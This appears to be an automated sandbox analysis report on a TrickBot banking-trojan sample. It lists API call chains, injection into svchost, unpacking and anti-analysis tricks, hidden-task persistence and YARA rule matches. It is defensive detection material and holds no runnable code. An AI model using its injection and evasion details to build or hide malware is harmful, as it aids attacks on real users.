Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10003220 NtReadVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,	7_3_10003220
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001830 NtAllocateVirtualMemory,	7_3_10001830
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10002CB0 MultiByteToWideChar,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrLoadDll,NtReadVirtualMemory,NtFreeVirtualMemory,	7_3_10002CB0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_100018C0 NtProtectVirtualMemory,	7_3_100018C0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_100017D0 NtWriteVirtualMemory,	7_3_100017D0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001AE0 NtCreateEvent,NtCreateEvent,NtDuplicateObject,NtDuplicateObject,NtSignalAndWaitForSingleObject,NtClose,NtClearEvent,NtWriteVirtualMemory,NtClearEvent,NtClearEvent,NtResumeThread,NtSignalAndWaitForSingleObject,NtClose,NtClose,NtDuplicateObject,NtDuplicateObject,NtFreeVirtualMemory,NtFreeVirtualMemory,	7_3_10001AE0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10002F60 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrGetProcedureAddress,NtReadVirtualMemory,NtFreeVirtualMemory,	7_3_10002F60
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_100015F0 NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,	7_3_100015F0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10003470 NtReadVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,	7_3_10003470
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001FF0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtQueryInformationProcess,NtWriteVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,	7_3_10001FF0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001880 NtFreeVirtualMemory,	7_3_10001880
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001E70 NtReadVirtualMemory,NtWriteVirtualMemory,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtSignalAndWaitForSingleObject,NtClose,NtClose,	7_3_10001E70

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001AE0	3_3_10001AE0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001FF0	3_3_10001FF0
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140002900	6_2_0000000140002900
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140012820	6_2_0000000140012820
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140003860	6_2_0000000140003860
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140014080	6_2_0000000140014080
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_000000014000E0C0	6_2_000000014000E0C0
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140013CD0	6_2_0000000140013CD0
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_000000014000F8D0	6_2_000000014000F8D0
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_000000014000E6D0	6_2_000000014000E6D0
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_000000014000F310	6_2_000000014000F310
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140015340	6_2_0000000140015340
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00000001400179C0	6_2_00000001400179C0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001AE0	7_3_10001AE0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001FF0	7_3_10001FF0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140002900	8_2_0000000140002900
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140012820	8_2_0000000140012820
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140003860	8_2_0000000140003860
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140014080	8_2_0000000140014080
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_000000014000E0C0	8_2_000000014000E0C0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140013CD0	8_2_0000000140013CD0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_000000014000F8D0	8_2_000000014000F8D0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_000000014000E6D0	8_2_000000014000E6D0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_000000014000F310	8_2_000000014000F310
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140015340	8_2_0000000140015340
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_00000001400179C0	8_2_00000001400179C0

Source: 55ryoipjfdr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
Source: 8.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trickbot hash1 = 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c, author = JPCERT/CC Incident Response Group, description = detect TrickBot in memory, rule_usage = memory scan
Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trickbot hash1 = 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c, author = JPCERT/CC Incident Response Group, description = detect TrickBot in memory, rule_usage = memory scan
Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@8/4@1/22

Source: C:\Windows\System32\svchost.exe

Code function: 6_2_0000000140002900 SetCurrentDirectoryW,GetTickCount,srand,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,??2@YAPEAX_K@Z,HeapFree,HeapFree,_time64,_time64,Sleep,??2@YAPEAX_K@Z,HeapFree,_time64,??3@YAXPEAX@Z,HeapFree,Sleep,_time64,HeapFree,_time64,_wtoi,_wtoi,HeapFree,HeapFree,HeapFree,FreeLibrary,CoUninitialize,

6_2_0000000140002900

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

Code function: 0_2_0040197E FindResourceW,LoadResource,LockResource,SizeofResource,

0_2_0040197E

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

File created: C:\Users\user\AppData\Roaming\winapp

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Mutant created: \BaseNamedObjects\Global\VLock
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\VLock

Source: 55ryoipjfdr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 55ryoipjfdr.exe	Virustotal: Detection: 90%
Source: 55ryoipjfdr.exe	ReversingLabs: Detection: 94%

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

File read: C:\Users\user\Desktop\55ryoipjfdr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\55ryoipjfdr.exe "C:\Users\user\Desktop\55ryoipjfdr.exe"
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Process created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs
Source: unknown	Process created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Process created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs	Jump to behavior

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: gqrotepg.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: remotepg.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: regapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: gqrotepg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: remotepg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: regapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: gqrotepg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: remotepg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: regapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: 55ryoipjfdr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Unpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Unpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

Code function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,

0_2_00401A00

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

File created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

Source: C:\Windows\System32\svchost.exe

Code function: 6_2_000000014000C3F0 LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_000000014000C3F0

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD304
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD6E4
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA04
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD244
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD2E4
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD6C4
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD424
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AE654
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD784
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD744
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD3C4

Source: C:\Windows\System32\svchost.exe

Code function: HeapFree,GetAdaptersInfo,HeapFree,HeapFree,

8_2_000000014000A230

Source: C:\Windows\System32\svchost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-8785

Source: C:\Windows\System32\svchost.exe

API coverage: 4.8 %

Source: C:\Windows\System32\svchost.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

Code function: 8_2_000000014000D0F0 HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,FindNextFileW,GetLastError,

8_2_000000014000D0F0

Source: C:\Windows\System32\svchost.exe

Code function: 6_2_000000014000C0C0 GetProcAddress,GetSystemInfo,

6_2_000000014000C0C0

Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124@%SystemRoot%\System32\ci.dll,-100Hyper-V RAWDDDD
Source: svchost.exe, 00000008.00000002.2670682517.00000159F2A77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000008.00000002.2670494241.00000159F2A2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@f

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

Code function: 3_3_10001020 LdrLoadDll,LdrLoadDll,

3_3_10001020

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

Code function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,

0_2_00401A00

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_0040116E mov eax, dword ptr fs:[00000030h]	0_2_0040116E
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_004C007E push dword ptr fs:[00000030h]	0_2_004C007E
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_004C03BB push dword ptr fs:[00000030h]	0_2_004C03BB
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_004D007E push dword ptr fs:[00000030h]	0_2_004D007E
Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_004D03BB push dword ptr fs:[00000030h]	0_2_004D03BB
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_2_007B03BB push dword ptr fs:[00000030h]	3_2_007B03BB
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_2_007B007E push dword ptr fs:[00000030h]	3_2_007B007E
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_2_007C007E push dword ptr fs:[00000030h]	3_2_007C007E
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_2_007C03BB push dword ptr fs:[00000030h]	3_2_007C03BB
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_2_006B03BB push dword ptr fs:[00000030h]	7_2_006B03BB
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_2_006B007E push dword ptr fs:[00000030h]	7_2_006B007E
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_2_006C007E push dword ptr fs:[00000030h]	7_2_006C007E
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_2_006C03BB push dword ptr fs:[00000030h]	7_2_006C03BB

Source: C:\Users\user\Desktop\55ryoipjfdr.exe

Code function: 0_2_00402200 GetProcessHeap,RtlFreeHeap,

0_2_00402200

Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140018520 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000140018520
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140018168 SetUnhandledExceptionFilter,	6_2_0000000140018168
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140018168 SetUnhandledExceptionFilter,	8_2_0000000140018168
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140018520 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0000000140018520

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

